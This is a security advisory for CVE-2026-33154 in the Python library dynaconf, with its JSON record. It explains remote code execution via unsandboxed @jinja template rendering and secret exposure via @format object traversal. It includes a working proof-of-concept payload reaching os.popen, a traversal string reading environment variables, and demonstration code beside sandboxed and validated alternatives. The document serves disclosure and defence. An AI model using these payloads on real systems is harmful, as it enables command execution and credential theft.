GHSA-PXRR-HQ57-Q35P

Vulnerability from github – Published: 2026-03-18 20:08 – Updated: 2026-04-14 21:59
Summary
dynaconf Affected by Remote Code Execution (RCE) via Insecure Template Evaluation in @jinja Resolver
Details

Summary

Dynaconf is vulnerable to Server-Side Template Injection (SSTI) due to unsafe template evaluation in the @jinja resolver. When the jinja2 package is installed, Dynaconf evaluates template expressions embedded in configuration values without a sandboxed environment.

If an attacker can influence configuration sources such as:

- environment variables
- .env files
- container environment configuration
- CI/CD secrets

they can execute arbitrary OS commands on the host system. In addition, the @format resolver allows object graph traversal, which may expose sensitive runtime objects and environment variables.

Details

The vulnerability arises because Dynaconf's string resolvers lack proper security boundaries.

  1. @jinja Resolver
The @jinja resolver renders templates using full Jinja2 evaluation. However, the rendering context is not sandboxed, which allows attackers to access Python's internal (dunder) attributes. Using objects such as cycler (a default Jinja2 global), attackers can reach the __globals__ of a Jinja2-internal function, where the os module is already imported.

Example attack path: cycler → __init__ → __globals__ → os → popen()
This leads to arbitrary command execution.

  2. @format Resolver
The @format resolver performs Python string formatting with internal objects exposed as format arguments. This allows attackers to traverse Python's object graph and access sensitive runtime objects.

Example traversal: {this.__class__.__init__.__globals__[os].environ}

This can expose:
  - API keys
  - database credentials
  - internal service tokens
  - environment secrets
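The @format traversal above, as an added example that is not part of the advisory or of dynaconf's code: a hypothetical `Settings` class stands in for the object the resolver exposes as `this`, a format string walks `__class__ → __init__ → __globals__ → os` to read a constructed environment variable, and `check_format_string` is the pre-formatting check a hardened resolver would run, refusing any replacement field that carries attribute access or indexing. All class, function and field names here are this example's own assumptions.

```python
"""Added example, not from the advisory or from dynaconf: how handing an
internal object to str.format() lets a format string walk the object graph,
and a pre-formatting check that refuses such strings."""
import os
import string
from typing import List


class Settings:
    """Hypothetical stand-in for the object a @format resolver exposes as
    `this`; it is not dynaconf's real settings class."""

    def __init__(self, database_url: str) -> None:
        self.database_url = database_url


# Constructed secret placed in the real process environment for the demo.
os.environ["EXAMPLE_DB_PASSWORD"] = "hunter2"


def render_unsafe(fmt: str, settings: Settings) -> str:
    """Vulnerable pattern: the whole object is exposed as `this`, so a format
    string can follow this.__class__.__init__.__globals__[os] into the os
    module imported by this file and read os.environ from there."""
    return fmt.format(this=settings)


# Allow-list of plain field names the application agrees to substitute.
SAFE_FIELDS = frozenset({"database_url"})


def check_format_string(fmt: str) -> List[str]:
    """Return the reasons `fmt` is rejected (an empty list means it is clean).

    string.Formatter.parse() yields one (literal, field, spec, conversion)
    tuple per replacement field, so field names can be inspected without
    evaluating them. Anything with attribute access ('.') or indexing ('[')
    is refused outright; so are positional fields and nested fields inside
    the format spec, which would otherwise be a second place to hide a lookup.
    """
    problems: List[str] = []
    for _literal, field, spec, _conversion in string.Formatter().parse(fmt):
        if field is None:  # trailing literal text, no replacement field
            continue
        if field == "" or field.isdigit():
            problems.append(f"positional field {field!r} not allowed")
        elif "." in field or "[" in field:
            problems.append(f"attribute/index traversal in {field!r}")
        elif field not in SAFE_FIELDS:
            problems.append(f"unknown field {field!r}")
        if spec and "{" in spec:
            problems.append(f"nested field in format spec {spec!r}")
    return problems


def render_safe(fmt: str, settings: Settings) -> str:
    """Hardened pattern: validate first, then format with a dict of plain
    values so the object itself is never reachable from the format string."""
    problems = check_format_string(fmt)
    if problems:
        raise ValueError("rejected format string: " + "; ".join(problems))
    values = {name: getattr(settings, name) for name in SAFE_FIELDS}
    return fmt.format(**values)


# The advisory's traversal, narrowed to a single environment variable.
LEAK = "{this.__class__.__init__.__globals__[os].environ[EXAMPLE_DB_PASSWORD]}"

if __name__ == "__main__":
    cfg = Settings("postgres://app@db/app")
    print("unsafe :", render_unsafe(LEAK, cfg))
    print("check  :", check_format_string(LEAK))
    print("safe   :", render_safe("{database_url}", cfg))
```

The check is deliberately stricter than "no dunders": `{this.database_url}` is refused too, because once attribute access is allowed at all, the allow-list has to be re-derived for every class the value can reach. Passing a dict of plain values instead of the object removes that problem at the root.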

PoC

import os
from dynaconf import Dynaconf

# Malicious configuration injection: Dynaconf() reads every DYNACONF_*
# environment variable by default, and the @jinja prefix makes it render the
# value as a Jinja2 template. The template walks cycler.__init__.__globals__
# to the os module imported by jinja2's own utils and runs a shell command.
os.environ["DYNACONF_RCE"] = "@jinja {{ cycler.__init__.__globals__.os.popen('id').read() }}"

settings = Dynaconf()
print("[!] Command Execution Result:")
print(settings.RCE)

Impact

Successful exploitation allows attackers to:

- Execute arbitrary OS commands on the host system
- Access sensitive environment variables
- Compromise application secrets
- Fully compromise the running application process

Because configuration values may originate from CI/CD pipelines, container orchestration systems, or environment injection, this vulnerability can become remotely exploitable in real-world deployments.

Remediation / Mitigation (Examples)

Upgrade to dynaconf 3.2.13 or later; the advisory record lists every release up to and including 3.2.12 as affected. Until the upgrade is in place, any source that can carry an @jinja or @format prefix (environment variables, .env files, container- and CI/CD-injected variables) must be as trusted as the application code itself, because a value written there runs with the application's privileges. Where you render templates or format strings yourself, prefer the following patterns:

  1. Use Jinja2 sandbox for template rendering
from jinja2.sandbox import SandboxedEnvironment
env = SandboxedEnvironment()
template = env.from_string("{{ config_value }}")
safe_value = template.render(config_value=user_input)
  2. Restrict @format usage to trusted values
safe_value = "{name}".format(name=trusted_name)
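The sandboxed rendering in item 1, as an added example that is not the advisory's or dynaconf's code: the advisory's cycler traversal rendered once through a plain `jinja2.Environment` and once through `SandboxedEnvironment`, with a helper that reports whether the sandbox blocked it. It assumes jinja2 is installed; the payload calls `os.getpid()` instead of `os.popen('id')` so it proves reach into the `os` module without spawning a shell, and the function names are this example's own.

```python
"""Added example, not from the advisory or from dynaconf: the advisory's
cycler traversal against an ordinary jinja2 Environment and against
SandboxedEnvironment. Assumes jinja2 is installed."""
import os

from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed payload: the advisory's traversal, but ending in os.getpid()
# rather than os.popen('id') so the demo does not start a shell.
PAYLOAD = "{{ cycler.__init__.__globals__.os.getpid() }}"


def expected_pid() -> str:
    """What the payload should print if it really reached the os module."""
    return str(os.getpid())


def render_unsandboxed(template_source: str) -> str:
    """Vulnerable pattern: a plain Environment hands out every attribute,
    dunders included, so the template walks cycler.__init__.__globals__
    into the `os` module that jinja2.utils imports."""
    return Environment().from_string(template_source).render()


def render_sandboxed(template_source: str) -> str:
    """Hardened pattern: SandboxedEnvironment treats any attribute whose name
    starts with an underscore as unsafe, so cycler.__init__ yields an
    undefined value and the next step of the traversal raises SecurityError."""
    return SandboxedEnvironment().from_string(template_source).render()


def classify(template_source: str) -> str:
    """'blocked' if the sandbox rejects the template, 'rendered' otherwise."""
    try:
        render_sandboxed(template_source)
    except SecurityError:
        return "blocked"
    return "rendered"


if __name__ == "__main__":
    print("unsandboxed:", render_unsandboxed(PAYLOAD), "(this pid:", expected_pid() + ")")
    print("sandboxed  :", classify(PAYLOAD))
    print("benign     :", classify("{{ 1 + 1 }}"), render_sandboxed("{{ 1 + 1 }}"))
```

The sandbox pattern applies where your own code renders templates. For dynaconf's built-in @jinja resolver the fix lives in the library; the record's references point at the upstream commit and the 3.2.13 release, and upgrading is the remediation for that path.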

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.2.12"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "dynaconf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.2.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33154"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336",
      "CWE-78",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T20:08:06Z",
    "nvd_published_at": "2026-03-20T21:17:15Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nDynaconf is vulnerable to Server-Side Template Injection (SSTI) due to unsafe template evaluation in the @jinja resolver.\nWhen the jinja2 package is installed, Dynaconf evaluates template expressions embedded in configuration values without a sandboxed environment.\n\nIf an attacker can influence configuration sources such as:\nenvironment variables\n.env files\ncontainer environment configuration\nCI/CD secrets\nthey can execute arbitrary OS commands on the host system.\nIn addition, the @format resolver allows object graph traversal, which may expose sensitive runtime objects and environment variables.\n\n### Details\nThe vulnerability arises because Dynaconf\u0027s string resolvers lack proper security boundaries.\n\n1. @jinja Resolver\nThe @jinja resolver renders templates using full Jinja2 evaluation.\nHowever, the rendering context is not sandboxed, which allows attackers to access Python\u0027s internal attributes.\nUsing objects such as cycler, attackers can reach Python\u0027s __globals__ and import the os module.\n\nExample attack path\ncycler\n \u2192 __init__\n \u2192 __globals__\n \u2192 os\n \u2192 popen()\nThis leads to arbitrary command execution.\n\n2. @format Resolver\nThe @format resolver performs Python string formatting using internal objects.\nThis allows attackers to traverse Python\u0027s object graph and access sensitive runtime objects.\nExample traversal:\n{this.__class__.__init__.__globals__[os].environ}\nThis can expose\n- API keys\n- database credentials\n- internal service tokens\n- environment secrets\n\n### PoC\n```\nimport os\nfrom dynaconf import Dynaconf\n# Malicious configuration injection\nos.environ[\"DYNACONF_RCE\"] = \"@jinja {{ cycler.__init__.__globals__.os.popen(\u0027id\u0027).read() }}\"\nsettings = Dynaconf()\nprint(\"[!] Command Execution Result:\")\nprint(settings.RCE)\n```\n### Impact\nSuccessful exploitation allows attackers to:\n- Execute arbitrary OS commands on the host system\n- Access sensitive environment variables\n- Compromise application secrets\n- Fully compromise the running application process\nBecause configuration values may originate from CI/CD pipelines, container orchestration systems, or environment injection, this vulnerability can become remotely exploitable in real-world deployments.\n\n\n### Remediation / Mitigation (Examples)\n\n1. Use Jinja2 sandbox for template rendering\n```\nfrom jinja2.sandbox import SandboxedEnvironment\nenv = SandboxedEnvironment()\ntemplate = env.from_string(\"{{ config_value }}\")\nsafe_value = template.render(config_value=user_input)```\n```\n2. Restrict @format usage to trusted values\n```\nsafe_value = \"{name}\".format(name=trusted_name)\n```",
  "id": "GHSA-pxrr-hq57-q35p",
  "modified": "2026-04-14T21:59:25Z",
  "published": "2026-03-18T20:08:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dynaconf/dynaconf/security/advisories/GHSA-pxrr-hq57-q35p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33154"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dynaconf/dynaconf/commit/2fbb45ee36b8c0caa5b924fe19f3c1a5e8603fa7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dynaconf/dynaconf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dynaconf/dynaconf/releases/tag/3.2.13"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "dynaconf Affected by Remote Code Execution (RCE) via Insecure Template Evaluation in @jinja Resolver"
}

